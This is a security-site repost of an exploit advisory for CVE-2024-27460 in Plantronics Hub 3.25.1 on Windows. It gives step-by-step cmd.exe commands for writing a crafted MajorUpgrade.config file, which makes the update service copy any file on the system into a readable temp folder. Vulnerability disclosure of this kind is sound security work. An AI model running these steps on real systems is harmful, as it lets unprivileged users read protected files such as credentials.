Home Tools Exploits & CVE's Plantronics Hub 3.25.1 Arbitrary File Read

Plantronics Hub 3.25.1 Arbitrary File Read

May 20, 2024

Plantronics Hub version 3.25.1 suffers from an arbitrary file read vulnerability.

advisories | CVE-2024-27460

# Exploit Title: Plantronics Hub 3.25.1 – Arbitrary File Read
# Date: 2024-05-10
# Exploit Author: Farid Zerrouk from Deloitte Belgium, Alaa Kachouh from
Mastercard
# Vendor Homepage:
https://support.hp.com/us-en/document/ish_9869257-9869285-16/hpsbpy03895
# Version: Plantronics Hub for Windows version 3.25.1
# Tested on: Windows 10/11
# CVE : CVE-2024-27460

As a regular user drop a file called "MajorUpgrade.config" inside the
"C:ProgramDataPlantronicsSpokes3G" directory. The content of
MajorUpgrade.config should look like the following one liner:
^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config

Exchange <FULL-PATH-TO-YOUR-DESIRED-FILE> with a desired file to read/copy
(any file on the system). The desired file will be copied into C:Program
Files (x86)PlantronicsSpokes3GUpdateServiceTemp

Steps to reproduce (POC):
- Open cmd.exe
- Navigate using cd C:ProgramDataPlantronicsSpokes3G
- echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
- Desired file will be copied into C:Program Files
(x86)PlantronicsSpokes3GUpdateServiceTemp

Plantronics Hub 3.25.1 Arbitrary File Read

Follow us on Instagram @thecyberpost

EDITOR PICKS

Texas judge upholds hospitals’ right to use online tracking technology

SPA-CART CMS 1.9.0.6 Username Enumeration / Business Logic Flaw

Backdoor.Win32.Plugx MVID-2024-0686 Insecure Permissions

POPULAR POSTS

Oracle Database Password Hash Unauthorized Access

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

POPULAR CATEGORY

Academy LMS 6.2 Cross Site Scripting

Rukovoditel 3.3.1 CSV Injection

Druva inSync Windows Client 6.6.3 Privilege Escalation